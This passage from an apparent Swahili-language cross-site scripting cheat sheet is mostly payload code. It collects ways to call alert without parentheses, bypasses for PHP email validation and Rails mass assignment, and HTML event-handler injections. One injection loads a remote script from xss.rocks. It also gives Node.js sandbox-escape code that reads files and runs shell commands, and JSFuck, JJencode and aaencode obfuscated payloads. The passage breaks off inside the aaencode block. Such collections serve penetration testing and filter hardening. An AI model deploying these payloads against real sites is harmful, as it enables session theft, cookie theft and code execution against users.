// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}
// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
```
- [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
- [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
**Kuita kazi isiyo na mipaka (alert)**
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">`javascript</span></div>
````javascript
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')
//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
```
## **Vikosi vya DOM**
Kuna **kodii ya JS** inayotumia **data isiyo salama inayodhibitiwa na mshambuliaji** kama `location.href`. Mshambuliaji anaweza kutumia hii kutekeleza kodii ya JS isiyo na mipaka.\
**Kwa sababu ya upanuzi wa maelezo ya** [**vikosi vya DOM, imehamishwa kwenye ukurasa huu**](dom-xss.md)**:**
{{#ref}}
dom-xss.md
{{#endref}}
Huko utapata **maelezo ya kina kuhusu vikosi vya DOM, jinsi vinavyosababishwa, na jinsi ya kuvifanyia kazi**.\
Pia, usisahau kwamba **mwishoni mwa chapisho lililotajwa** unaweza kupata maelezo kuhusu [**shambulio la DOM Clobbering**](dom-xss.md#dom-clobbering).
### Kuboresha Self-XSS
### Cookie XSS
Ikiwa unaweza kuanzisha XSS kwa kutuma payload ndani ya cookie, hii kwa kawaida ni self-XSS. Hata hivyo, ikiwa unapata **subdomain iliyo hatarini kwa XSS**, unaweza kutumia XSS hii kuingiza cookie katika domain nzima na kufanikisha kuanzisha cookie XSS katika domain kuu au subdomains nyingine (zilizo hatarini kwa cookie XSS). Kwa hili unaweza kutumia shambulio la cookie tossing:
{{#ref}}
../hacking-with-cookies/cookie-tossing.md
{{#endref}}
Unaweza kupata matumizi makubwa ya mbinu hii katika [**chapisho hili la blog**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html).
### Kutuma kikao chako kwa admin
Labda mtumiaji anaweza kushiriki profaili yake na admin na ikiwa self XSS iko ndani ya profaili ya mtumiaji na admin anapofikia, atachochea udhaifu huo.
### Kurefusha Kikao
Ikiwa unapata self XSS na ukurasa wa wavuti una **kurefusha kikao kwa wasimamizi**, kwa mfano kuruhusu wateja kuomba msaada na ili admin kusaidie atakuwa akiona kile unachokiona katika kikao chako lakini kutoka kikao chake.
Unaweza kumfanya **msimamizi achochee self XSS yako** na kuiba cookies/kikao chake.
## Njia Nyingine za Kupita
### Unicode Iliyosawazishwa
Unaweza kuangalia ikiwa **thamani zinazorejelewa** zina **sawasishwa kwa unicode** kwenye seva (au upande wa mteja) na kutumia kazi hii kupita ulinzi. [**Pata mfano hapa**](../unicode-injection/index.html#xss-cross-site-scripting).
### PHP FILTER_VALIDATE_EMAIL flag Bypass
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
"><svg/onload=confirm(1)>"@x.y
```
### Ruby-On-Rails bypass
Kwa sababu ya **RoR mass assignment** nukuu zinaingizwa kwenye HTML na kisha kikomo cha nukuu kinapita na maeneo ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.\
Mfano wa fomu ([from this report](https://hackerone.com/reports/709336)), ikiwa utatuma payload:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
Pairi "Key","Value" itarudi kama ifuatavyo:
```
{" onfocus=javascript:alert('xss') autofocus a"=>"a"}
```
Kisha, sifa ya onfocus itaingizwa na XSS inatokea.
### Mchanganyiko maalum
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markup</span></div>
```markup
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1')</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
```
### XSS na uingizaji wa kichwa katika jibu la 302
Ikiwa unapata kwamba unaweza **kuingiza vichwa katika jibu la 302 Redirect** unaweza kujaribu **kufanya kivinjari kiendeshe JavaScript isiyo na mipaka**. Hii si **rahisi** kwani vivinjari vya kisasa havitafsiri mwili wa jibu la HTTP ikiwa msimamo wa jibu la HTTP ni 302, hivyo payload ya cross-site scripting ni bure.
Katika [**ripoti hii**](https://www.gremwell.com/firefox-xss-302) na [**hii**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi unavyoweza kujaribu protokali kadhaa ndani ya kichwa cha Location na kuona ikiwa yoyote yao inaruhusu kivinjari kuchunguza na kutekeleza payload ya XSS ndani ya mwili.\
Protokali zilizojulikana zamani: `mailto://`, `//x:1/`, `ws://`, `wss://`, _kichwa cha Location kisicho na kitu_, `resource://`.
### Herufi, Nambari na Nukta Pekee
Ikiwa unaweza kuonyesha **callback** ambayo javascript itakuwa **inaendesha** ikipunguzwa kwa herufi hizo. [**Soma sehemu hii ya chapisho hili**](#javascript-function) ili kujua jinsi ya kutumia tabia hii.
### Aina za Maudhui Halali za `<script>` kwa XSS
(Kutoka [**hapa**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Ikiwa unajaribu kupakia script yenye **aina ya maudhui** kama `application/octet-stream`, Chrome itatoa kosa lifuatalo:
> Refused to execute script from ‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
Aina pekee za **Content-Type** ambazo zitaruhusu Chrome kuendesha **script iliyopakiwa** ni zile ndani ya const **`kSupportedJavascriptTypes`** kutoka [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">c</span></div>
```c
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};
```
### Aina za Script kwa XSS
(Kutoka [**hapa**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Hivyo, ni aina gani zinaweza kuashiria kupakia script?
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div>
```html
<script type="???"></script>
```
- **module** (default, hakuna cha kuelezea)
- [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele ambacho unaweza kufunga kundi la data (HTML, CSS, JS…) pamoja katika faili ya **`.wbn`**.
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div>
```html
<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP
```
- [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha sintaksia ya kuagiza
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div>
```html
<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>
<!-- With importmap you can do the following -->
<script>
import moment from "moment"
import { partition } from "lodash"
</script>
```
Tabia hii ilitumika katika [**hati hii**](https://github.com/zwade/yaca/tree/master/solution) kubadilisha maktaba ili eval itumike vibaya inaweza kusababisha XSS.
- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki hasa kinakusudia kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kifanyikavyo ni hivi:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div>
```html
<script type="speculationrules">
{
"prerender": [
{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
{
"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1
}
]
}
</script>
```
### Web Content-Types to XSS
(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Aina zifuatazo za maudhui zinaweza kutekeleza XSS katika vivinjari vyote:
- text/html
- application/xhtml+xml
- application/xml
- text/xml
- image/svg+xml
- text/plain (?? si kwenye orodha lakini nadhani niliiona hii katika CTF)
- application/rss+xml (off)
- application/atom+xml (off)
Katika vivinjari vingine **`Content-Types`** nyingine zinaweza kutumika kutekeleza JS isiyo na mipaka, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)
### xml Content Type
Ikiwa ukurasa unarudisha aina ya maudhui ya text/xml inawezekana kuashiria namespace na kutekeleza JS isiyo na mipaka:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">xml</span></div>
```xml
<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>
<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
```
### Mifumo Maalum ya Kubadilisha
Wakati kitu kama **`"some {{template}} data".replace("{{template}}", <user_input>)`** kinatumika. Mshambuliaji anaweza kutumia [**mabadiliko maalum ya nyuzi**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement) kujaribu kupita baadhi ya ulinzi: `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) ``
Kwa mfano katika [**hii andiko**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hii ilitumika ku **kutoa nyuzi za JSON** ndani ya script na kutekeleza msimbo wa kiholela.
### Chrome Cache hadi XSS
{{#ref}}
chrome-cache-to-xss.md
{{#endref}}
### XS Jails Kutoroka
Ikiwa una seti ndogo tu ya wahusika kutumia, angalia hizi suluhisho nyingine halali za matatizo ya XSJail:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
// use of with
with(console)log(123)
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
Ikiwa **kila kitu hakijafafanuliwa** kabla ya kutekeleza msimbo usioaminika (kama ilivyo katika [**hii ripoti**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)) inawezekana kuunda vitu vya manufaa "kutoka kwa chochote" ili kutumia utekelezaji wa msimbo usioaminika:
- Kutumia import()
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
// although import "fs" doesn’t work, import('fs') does.
import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))
```
- Kupata `require` kwa njia isiyo ya moja kwa moja
[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) moduli zimefungwa na Node.js ndani ya kazi, kama hii:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})
```
Kwa hivyo, ikiwa kutoka kwa moduli hiyo tunaweza **kuita kazi nyingine**, inawezekana kutumia `arguments.callee.caller.arguments[1]` kutoka kwa kazi hiyo kufikia **`require`**:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
"/flag.txt",
"utf8"
)
})()
```
Kwa njia sawa na mfano uliopita, inawezekana **kutumia waandishi wa makosa** kufikia **wrapper** ya moduli na kupata **`require`** kazi:
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = "".constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) =>
structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log("=".repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req("child_process").execSync("id").toString())
}
}
}
trigger()
```
### Obfuscation & Advanced Bypass
- **Obfuscations tofauti katika ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
- [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
- [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
- [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
- [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
- [http://www.jsfuck.com/](http://www.jsfuck.com)
- JSFuck yenye ujuzi zaidi: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
- [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
- [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
- [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
//Katana
<script>
([,ウ,,,,ア]=[]+{}
,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
</script>
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
//JSFuck
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>
```
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div>
```javascript
//aaencode
゚ω゚ノ = /`m´)ノ ~┻━┻ / /*´∇`*/["_"]
o = ゚ー゚ = _ = 3
c = ゚Θ゚ = ゚ー゚ - ゚ー゚
゚Д゚ = ゚Θ゚ = (o ^ _ ^ o) / (o ^ _ ^ o)
゚Д゚ = {
゚Θ゚: "_",
゚ω゚ノ: ((゚ω゚ノ == 3) + "_")[゚Θ゚],
゚ー゚ノ: (゚ω゚ノ + "_")[o ^ _ ^ (o - ゚Θ゚)],
゚Д゚ノ: ((゚ー゚ == 3) + "_")[゚ー゚],
}
゚Д゚[゚Θ゚] = ((゚ω゚ノ == 3) + "_")[c ^ _ ^ o]
゚Д゚["c"] = (゚Д゚ + "_")[゚ー゚ + ゚ー゚ - ゚Θ゚]
゚Д゚["o"] = (゚Д゚ + "_")[゚Θ゚]
゚o゚ =
゚Д゚["c"] +
゚Д゚["o"] +
(゚ω゚ノ + "_")[゚Θ゚] +
((゚ω゚ノ == 3) + "_")[゚ー゚] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
((゚ー゚ == 3) + "_")[゚ー゚ - ゚Θ゚] +
゚Д゚["c"] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
゚Д゚["o"] +
((゚ー゚ == 3) + "_")[゚Θ゚]
゚Д゚["_"] = (o ^ _ ^ o)[゚o゚][゚o゚]
゚ε゚ =
((゚ー゚ == 3) + "_")[゚Θ゚] +
゚Д゚.゚Д゚ノ +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[o ^ _ ^ (o - ゚Θ゚)] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
(゚ω゚ノ + "_")[゚Θ゚]
゚ー゚ += ゚Θ゚
゚Д゚[゚ε゚] = "\\"
゚Д゚.゚Θ゚ノ = (゚Д゚ + ゚ー゚)[o ^ _ ^ (o - ゚Θ゚)]
o゚ー゚o = (゚ω゚ノ + "_")[c ^ _ ^ o]
゚Д゚[゚o゚] = '"'
゚Д゚["_"](
゚Д゚["_"](
゚ε゚ +
゚Д゚[゚o゚] +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
(゚ー゚ + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
